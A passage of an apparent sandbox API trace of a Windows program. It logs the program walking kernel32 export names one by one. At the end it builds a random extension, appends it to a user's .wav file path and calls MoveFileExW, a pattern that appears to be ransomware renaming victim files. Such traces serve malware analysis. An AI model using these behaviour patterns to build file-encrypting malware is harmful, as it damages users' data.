lpString1=0x3f2cf70, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0085.545] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0085.545] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0085.545] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0085.545] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0085.545] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0085.545] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0085.545] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0085.545] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0085.545] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0085.545] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0085.545] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0085.545] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0085.545] lstrlenA (lpString="CREATEEVENTA") returned 12 [0085.545] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0085.545] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0085.546] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0085.546] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0085.546] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0085.546] lstrlenA (lpString="CREATEEVENTW") returned 12 [0085.546] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0085.546] lstrlenA (lpString="CREATEFIBER") returned 11 [0085.546] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0085.546] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0085.546] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0085.546] lstrlenA (lpString="CREATEFILEA") returned 11 [0085.546] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0085.546] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0085.546] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0085.546] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0085.546] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0085.546] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0085.546] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0085.546] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0085.546] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0085.546] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0085.546] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0085.546] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0085.546] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0085.546] lstrlenA (lpString="CREATEFILEW") returned 11 [0085.546] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0085.546] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0085.546] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0085.546] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0085.546] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0085.546] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0085.546] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0085.546] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0085.546] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0085.546] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0085.546] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0085.546] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0085.546] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0085.547] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0085.547] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0085.547] lstrlenA (lpString="CREATEJOBSET") returned 12 [0085.547] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0085.547] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0085.547] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0085.547] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0085.547] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0085.547] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0085.547] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0085.547] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0085.547] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0085.547] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0085.547] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0085.547] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0085.547] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0085.547] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0085.547] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0085.547] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0085.547] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0085.547] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0085.547] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0085.547] lstrlenA (lpString="CREATEPIPE") returned 10 [0085.547] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0085.547] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0085.547] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0085.547] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0085.547] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0085.547] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0085.547] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0085.547] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0085.547] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0085.548] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0085.548] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0085.548] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0085.548] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0085.548] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0085.548] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0085.548] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0085.548] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0085.548] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0085.548] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0085.548] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0085.548] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0085.548] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0085.548] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0085.548] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0085.548] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0085.548] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0085.548] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0085.548] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0085.548] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0085.548] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0085.548] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0085.548] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0085.548] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0085.548] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0085.548] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0085.548] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0085.548] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0085.548] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0085.548] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0085.548] lstrlenA (lpString="CREATETHREAD") returned 12 [0085.548] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0085.548] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0085.548] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0085.548] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0085.548] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0085.549] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0085.549] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0085.549] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0085.549] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0085.549] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0085.549] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0085.549] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0085.549] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0085.549] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0085.549] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0085.549] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0085.549] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0085.549] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0085.549] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0085.549] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0085.549] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0085.549] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0085.549] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0085.549] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0085.549] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0085.549] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0085.549] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0085.549] lstrlenA (lpString="CTRLROUTINE") returned 11 [0085.549] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0085.549] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0085.549] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0085.549] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0085.549] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0085.549] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0085.549] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0085.549] lstrlenA (lpString="DEBUGBREAK") returned 10 [0085.549] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0085.549] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0085.549] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0085.549] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0085.549] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0085.550] lstrlenA (lpString="DECODEPOINTER") returned 13 [0085.550] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0085.550] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0085.550] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0085.550] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0085.550] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0085.550] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0085.550] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0085.550] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0085.550] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0085.550] lstrlenA (lpString="DELETEATOM") returned 10 [0085.550] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0085.550] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0085.550] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0085.550] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0085.550] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0085.550] lstrlenA (lpString="DELETEFIBER") returned 11 [0085.550] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0085.550] lstrlenA (lpString="DELETEFILEA") returned 11 [0085.550] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0085.550] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0085.550] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0085.550] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0085.550] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0085.550] lstrlenA (lpString="DELETEFILEW") returned 11 [0085.550] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0085.550] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0085.550] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0085.550] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0085.550] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0085.550] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0085.550] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0085.550] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0085.550] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0085.550] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0085.550] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0085.550] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0085.551] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0085.551] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0085.551] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0085.551] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0085.551] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0085.551] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0085.551] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0085.551] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0085.551] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0085.551] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0085.551] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0085.551] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0085.551] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0085.551] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0085.551] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0085.551] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0085.551] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0085.551] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0085.551] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0085.551] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0085.551] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0085.551] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0085.551] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0085.551] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0085.551] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0085.551] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0085.551] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0085.551] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0085.551] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0085.551] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0085.551] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0085.551] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0085.551] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0085.551] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0085.551] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0085.551] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0085.551] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0085.552] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0085.552] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0085.552] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0085.552] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0085.552] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0085.552] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0085.552] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0085.552] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0085.552] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0085.552] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0085.552] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0085.552] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0085.552] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0085.552] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0085.552] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0085.552] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0085.552] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0085.552] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0085.552] lstrcpyW (in: lpString1=0xfb0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0085.552] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\zmVkZ0mtR2bYJ\\LrBZvj2Te9U.wav") returned 82 [0085.552] wsprintfW (in: param_1=0x3f2dc28, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\zmVkZ0mtR2bYJ\\LrBZvj2Te9U.wav.3aZDcm") returned 89 [0085.552] MoveFileExW 